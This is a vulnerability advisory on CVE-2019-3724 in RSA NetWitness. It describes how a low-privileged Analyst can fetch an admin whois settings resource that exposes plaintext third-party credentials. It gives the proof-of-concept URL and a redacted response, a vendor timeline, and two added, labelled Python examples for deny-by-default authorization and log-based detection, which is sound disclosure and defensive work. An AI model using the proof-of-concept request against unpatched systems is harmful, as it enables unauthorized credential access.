Authorization Bypass in RSA NetWitness


    SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
    =======================================================================
      title: Authorization Bypass
      product: RSA NetWitness
      vulnerable version: <10.6.6.1, <11.2.1.1
      fixed version: 10.6.6.1, 11.2.1.1
      CVE number: CVE-2019-3724
      impact: Medium
      homepage: https://www.rsa.com
      found: 2018-09-18
      by: Mantas Juskauskas (Office Vilnius)
      SEC Consult Vulnerability Lab

      An integrated part of SEC Consult
      Europe | Asia | North America

      https://www.sec-consult.com

    =======================================================================

    Vendor description:
    -------------------
    "RSA provides more than 30,000 customers around the world with the essential
    security capabilities to protect their most valuable assets from cyber
    threats. With RSA's award-winning products, organizations effectively detect,
    investigate, and respond to advanced attacks; confirm and manage identities;
    and ultimately, reduce IP theft, fraud, and cybercrime."

    Source: https://www.rsa.com/en-us/company/about


    Business recommendation:
    ------------------------
    By exploiting the vulnerability documented in this advisory an unauthorized
    attacker can access an administrative resource that may contain plain text
    credentials to a 3rd party system.

    The vendor provides a patch which should be installed on affected systems.


    Vulnerability overview/description:
    -----------------------------------
    The authorization mechanism provided by the platform is prone to an authorization
    bypass vulnerability, which can be easily exploited by authenticated (but low
    privileged) remote attackers for gaining access to administrative information
    including plaintext passwords.


    Proof of concept:
    -----------------
    A logged-in low privileged user (e.g. with role Analyst) is able to access
    an administrative resource by calling the following URL:

    https://[host]/admin/system/whois/properties

    After the above URL is accessed, the server returns the following HTTP response
    that contains sensitive information to a 3rd party whois service including
    plaintext passwords:

    HTTP/1.1 200 OK
    Server: nginx
    Date: [snip]
    Content-Type: application/json;charset=UTF-8
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    X-Content-Type-Options: nosniff
    Strict-Transport-Security: max-age=31536000 ; includeSubDomains
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: [snip]
    Content-Length: 795

    {"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}}
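    The advisory does not say why the platform's authorization check let an Analyst reach this administrative resource. The following added example (written for this page, not RSA's or SEC Consult's code) models one common way such a gap arises, as an assumption rather than the confirmed root cause: an explicit list of protected admin endpoints that a newer endpoint was never added to. It contrasts that with a deny-by-default rule keyed on a normalized path prefix, which is the shape of check a defender would want for every resource under /admin/. The role names and the listed endpoints are constructed for the example.

```python
"""Added example: endpoint-allowlist authorization versus deny-by-default
prefix authorization. The 'Model A' gap is an assumed illustration, not
the documented root cause in RSA NetWitness."""
from dataclasses import dataclass
from posixpath import normpath


@dataclass(frozen=True)
class Request:
    path: str
    roles: frozenset  # roles held by the authenticated user


# Model A (gap-prone): only paths explicitly listed here require the admin role.
# A resource that is added later and not listed is open to any logged-in user.
ADMIN_ONLY_ENDPOINTS = {        # constructed sample list
    "/admin/system/users",
    "/admin/system/settings",
}


def authorize_by_endpoint_list(req: Request) -> bool:
    """Allow unless the exact path is on the admin-only list."""
    if req.path in ADMIN_ONLY_ENDPOINTS:
        return "Administrator" in req.roles
    return True  # anything not listed is reachable by any authenticated user


# Model B (deny by default): each protected prefix names the roles that may
# enter it; a path matching no rule is denied. Prefixes are stored without a
# trailing slash and compared against the normalized path so that segments
# like "/a/../admin" cannot sidestep the rule.
PREFIX_RULES = [                # constructed sample rules
    ("/admin", {"Administrator"}),
    ("/investigation", {"Administrator", "Analyst"}),
]


def _under(path: str, prefix: str) -> bool:
    return path == prefix or path.startswith(prefix + "/")


def authorize_by_prefix(req: Request) -> bool:
    """Deny unless a prefix rule matches and the user holds one of its roles."""
    path = normpath(req.path)            # collapse "." and ".." segments
    for prefix, allowed_roles in PREFIX_RULES:
        if _under(path, prefix):
            return bool(req.roles & allowed_roles)
    return False


def compare(path: str, roles) -> dict:
    """Evaluate the same request under both models."""
    req = Request(path=path, roles=frozenset(roles))
    return {
        "endpoint_list": authorize_by_endpoint_list(req),
        "prefix_deny_default": authorize_by_prefix(req),
    }


if __name__ == "__main__":
    # The advisory's scenario: an Analyst requesting the whois properties resource.
    print(compare("/admin/system/whois/properties", ["Analyst"]))
```

    Under Model A the Analyst's request passes because the whois properties path is simply not in the list; under Model B it is denied because everything under /admin requires the Administrator role. Running the prefix check on the normalized path matters: a rule that matched the raw string would still be bypassable through traversal segments, so normalization (or equivalent routing-layer canonicalization) belongs in front of the check.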



    Vulnerable / tested versions:
    -----------------------------
    The identified vulnerability has been verified to exist in the
    RSA NetWitness platform, version 11.1.0.1.

    According to the vendor, platform version 10 is also affected.

    The following versions are vulnerable:
    * <10.6.6.1
    * <11.2.1.1


    Vendor contact timeline:
    ------------------------
    2018-10-01: Contacting vendor through PGP via secure@dell.com
    2018-10-02: Vendor acknowledges the information was received, forwards
                the info to the relevant department
    2018-10-11: Vendor confirms the impact of the authorization issue,
                starts to work on the remediation timeline
    2018-10-15: Vendor provides additional information
    2018-10-22: Contacting vendor to provide the remediation timeline
    2018-10-23: Further email exchange related to the remediation timeline
    2019-01-18: Vendor provides an update on the fix timeline
    2019-03-05: Asking for a status update
    2019-03-06: Vendor provides a status update on the release, patch for
                platform version 11 will be released in March, version 10
                Mid-April
    2019-04-01: Asking for a specific release date & further status update
    2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,
                they will inform us
    2019-05-06: Asking for a status update; no answer
    2019-05-09: Noticed that the new release has been online for a while now, asking
                the vendor for a status update again
    2019-05-09: Vendor: published security advisory URL and CVE
    2019-05-15: SEC Consult advisory release


    Solution:
    ---------
    The following patched versions address the identified issue:
    * 11.2.1.1
    * 10.6.6.1

    Security advisory of the vendor: https://community.rsa.com/docs/DOC-104202

    The vendor specifically told us that version 11.3 is not affected by this
    vulnerability.


    Workaround:
    -----------
    None
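    With no workaround available before the patch, the remaining compensating control is to watch for the access pattern the advisory describes: a non-administrative account receiving a successful response for a resource under /admin/. The following added example (not part of the advisory and not NetWitness code) runs that check over constructed access-log lines in an assumed format that carries the user's role; the format, field names and sample entries are all assumptions for the example.

```python
"""Added example: flag successful admin-path requests by non-admin roles in
access logs. Log format and sample lines are constructed, not NetWitness output."""
import re
from collections import Counter

# Assumed format: "<timestamp> user=<name> role=<role> <METHOD> <path> <status>"
SAMPLE_LOG = """\
2019-05-15T10:00:01Z user=alice role=Administrator GET /admin/system/whois/properties 200
2019-05-15T10:00:05Z user=bob role=Analyst GET /investigation/events 200
2019-05-15T10:00:09Z user=bob role=Analyst GET /admin/system/whois/properties 200
2019-05-15T10:00:12Z user=bob role=Analyst GET /admin/system/users 403
2019-05-15T10:00:20Z user=carol role=Analyst GET /admin/system/whois/properties 200
this line is malformed and must be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) role=(?P<role>\S+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)

PRIVILEGED_ROLES = {"Administrator"}   # roles expected to reach /admin/
ADMIN_PREFIX = "/admin/"


def parse_line(line: str):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_bypass_hits(log_text: str) -> list:
    """Records where a non-privileged role got a 2xx for a path under /admin/.

    A 4xx on an admin path is the expected outcome for such a role and is not
    reported; only a success is an indicator of missing authorization.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["path"].startswith(ADMIN_PREFIX)
                and rec["role"] not in PRIVILEGED_ROLES
                and rec["status"] // 100 == 2):
            hits.append(rec)
    return hits


def summarize_by_user(hits: list) -> dict:
    """Count flagged requests per user, useful for prioritising follow-up."""
    return dict(Counter(h["user"] for h in hits))


if __name__ == "__main__":
    found = find_bypass_hits(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['user']} ({h['role']}) -> {h['path']} {h['status']}")
    print(summarize_by_user(found))
```

    The rule deliberately keys on the success status rather than on the request alone: a denied (403) request to an admin path by an Analyst is the system working as intended, whereas a 200 is the evidence that the authorization check did not fire. Once the patched version is deployed, the same query serves as a regression check that the resource is no longer reachable by low-privileged roles.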


    Advisory URL:
    -------------
    https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    SEC Consult Vulnerability Lab

    SEC Consult
    Europe | Asia | North America

    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
    ensures the continued knowledge gain of SEC Consult in the field of network
    and application security to stay ahead of the attacker. The SEC Consult
    Vulnerability Lab supports high-quality penetration testing and the evaluation
    of new offensive and defensive technologies for our customers. Hence our
    customers obtain the most current information about vulnerabilities and valid
    recommendation about the risk profile of new technologies.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://www.sec-consult.com/en/career/index.html

    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://www.sec-consult.com/en/contact/index.html
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Mail: research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: http://blog.sec-consult.com
    Twitter: https://twitter.com/sec_consult

    EOF M. Juskauskas / @2019

    Original post: https://www.cnblogs.com/iAmSoScArEd/p/10996833.html